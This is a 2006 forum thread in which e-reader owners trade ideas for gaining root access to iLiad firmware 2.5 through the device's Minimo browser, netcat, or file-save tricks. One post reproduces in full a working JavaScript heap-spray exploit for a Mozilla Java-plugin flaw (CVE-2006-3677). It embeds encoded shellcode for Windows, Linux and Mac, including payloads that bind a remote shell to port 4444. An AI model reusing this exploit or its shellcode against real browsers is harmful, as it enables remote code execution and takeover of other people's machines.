07-29-2006, 11:05 AM | #1 |
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
|
Status quo
Can you tell me what is the current status quo for gaining root access in firmware 2.5? I know some people tried to brute force the password, alas that could take a *long* time.
|
07-29-2006, 12:00 PM | #2 |
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
|
Brute forcing the pasword will not be needing, because a netcat can be installed, and even busybox incoporates one.
What is needed is a way to install a file in /etc/rc.0 or in ~/ or similar points, in order to execute the netcat or arbitrary scripts. Any arbitrary script execution should work, and also to enable the save as... window in any application would work. I do not know how to do it. An interesting list of mozilla bugs is here http://searchsecurity.techtarget.com...180286,00.html but I do not know if they apply to the modifyed minimo browser we run. Any other starting points should be appreciated. Users of 2.4 can try to upgrade to 2.5 keeping control along a delicate process, which I failed to complete sucessfully (but I describe in a separate thread). |
Advert | |
|
07-29-2006, 12:35 PM | #3 |
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
|
Thanks for the link, arivero. Some other good places to watch out for possible Minimo exploits are:
http://forums.mozillazine.org/viewforum.php?f=47 https://bugzilla.mozilla.org/enter_b...F%22uct=Minimo A thought: Let's assume iRex will release the SDK soon. Hypothetically, do you think they could still restrict access to the device as they do now with 2.5, or would they have to give developers more access in order to make use of the SDK? |
07-29-2006, 01:18 PM | #4 | |
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
|
Quote:
|
|
07-29-2006, 01:39 PM | #5 | |
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
|
Has anyone tried this exploit that worked for Mozilla Firefox until 1.5.0.4? Perhaps it would work for iRex Minimo as well...
Quote:
|
|
Advert | |
|
07-29-2006, 01:43 PM | #6 |
Uebermensch
Posts: 2,583
Karma: 1094606
Join Date: Jul 2003
Location: Italy
Device: Kindle
|
Here the full code of the exploit. Seems it requires a Java plugin which I am not sure exists in the case of Minimo.
Code:
<script> // MoBB Demonstration function Demo() { // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html // https://bugzilla.mozilla.org/show_bug.cgi?id=342267 // CVE-2006-3677 // The Java plugin is required for this to work // win32 = calc.exe var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065'); var fill_win32 = unescape('%u0800'); var addr_win32 = 0x08000800; // linux = touch /tmp/METASPLOIT (unreliable) var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080'); var fill_linux = unescape('%ua8a8'); var addr_linux = -0x58000000; // Integer wrap: 0xa8000000 // mac os x ppc = bind a shell to 4444 var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000'); var fill_macppc = unescape('%u0c0c'); var addr_macppc = 0x0c000000; // mac os x intel = bind a shell to 4444 // Thanks to nemo[at]felinemenace.org for shellcode // Thanks to Todd Manning for the target information and testing var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd'); var fill_macx86 = unescape('%u1c1c'); var addr_macx86 = 0x1c000000; // Start the browser detection var shellcode; var addr; var fill; var ua = '' + navigator.userAgent; if (ua.indexOf('Linux') != -1) { alert('Trying to create /tmp/METASPLOIT'); shellcode = shellcode_linux; addr = addr_linux; fill = fill_linux; } if (ua.indexOf('Windows') != -1) { alert('Trying to launch Calculator'); shellcode = shellcode_win32; addr = addr_win32; fill = fill_win32; } if (ua.indexOf('PPC Mac OS') != -1) { alert('Trying to bind a shell to 4444'); shellcode = shellcode_macppc; addr = addr_macppc; fill = fill_macppc; } if (ua.indexOf('Intel Mac OS') != -1) { alert('Trying to bind a shell to 4444'); shellcode = shellcode_macx86; addr = addr_macx86; fill = fill_macx86; } if (! shellcode) { alert('OS not supported, only attempting a crash!'); shellcode = unescape('%ucccc'); fill = unescape('%ucccc'); addr = 0x02020202; } var b = fill; while (b.length <= 0x400000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } if (window.navigator.javaEnabled) { window.navigator = (addr / 2); try { java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0 ); alert('Patched!'); }catch(e){ alert('No Java plugin installed!'); } } } </script> |
07-29-2006, 01:45 PM | #7 | |
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
|
Quote:
|
|
07-29-2006, 02:42 PM | #8 |
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
|
I see some no-crack alternatives:
1)If chrome privileges are enabled or they can be reached, then a New File ('/tmp/example') javascript call is all we need. See http://docs.mandragor.org/files/Misc...-5-sect-5.html Problem being, I am not sure how fully the js libraries are provided in mozilla minimo (it is minimo). But perhaps they can be provided from any external file. 2)To learn how to build a javascript navigation toolbar *including Save As... button*; this button is disabled in minimo but it should exist. Perhaps toinvoke it does not require chrome priviledges. |
07-29-2006, 02:52 PM | #9 |
iLiad Maniac
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
|
i think they messed up the save as routine, since you can not save anything anywhere. I always got an error. They might have used a bogus tempfile and so minimo cant save anything.
/edit: tried to install an xpi, but cant do that either. |
07-29-2006, 03:11 PM | #10 | |
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
|
Quote:
|
|
07-29-2006, 03:22 PM | #11 | |
iLiad Maniac
Posts: 1,382
Karma: 2369
Join Date: Apr 2006
Location: Germany
Device: Bookeen Opus (i love that thing) and iPad (what an irony)
|
Quote:
|
|
07-30-2006, 10:51 AM | #12 | |
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
|
Quote:
|
|
07-30-2006, 03:18 PM | #13 |
Member
Posts: 22
Karma: 10
Join Date: May 2006
Device: Sony Librié
|
Just as a clarification for the techno-idiot (me)... Wit 2.4 you could install all kinds of stuff and play with the system and with 2.5 you're stuck with what iRex gives you for your baby? Did I get that right? Damn!
|
07-30-2006, 04:05 PM | #14 |
Mad Scientist
Posts: 294
Karma: 242
Join Date: May 2006
Location: Germany
Device: Zaurus, HTCMagician, iLiad
|
Gavrahil, I would say:
With 2.4 you could try to install all kinds of stuff and try to play with the system. |
07-31-2006, 06:11 AM | #15 | |
Guru
Posts: 607
Karma: 2157
Join Date: Oct 2005
Device: NCR3125, Nokia 770,...
|
Quote:
I was not expecting to need a xpi plugin; perhaps something simpler as old IE document.execCommand('SaveAs') that requires user interaction and should not be a priviledged command after all. PS: Mozilla security releases are at http://www.mozilla.org/projects/secu...abilities.html |
|
Thread Tools | Search this Thread |
|
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
Historical Fiction Sienkiewicz, Henryk: Quo Vadis (german) v1.0 02 Feb 2010 | Josch91 | BBeB/LRF Books | 0 | 02-02-2010 10:34 AM |
Historical Fiction Sienkiewicz, Henryk: Quo Vadis (german) v1.0 02 Feb 2010 | Josch91 | ePub Books | 0 | 02-02-2010 10:33 AM |
Other Fiction Sienkiewicz, Henryk: Quo Vadis? german 16.11.2009 | Insider | ePub Books | 0 | 11-15-2009 11:26 PM |
On the sad status quo of the Mobile Web | Colin Dunstan | Lounge | 4 | 04-26-2005 09:47 AM |
Status Quo | Alexander Turcic | Announcements | 11 | 11-29-2003 08:14 AM |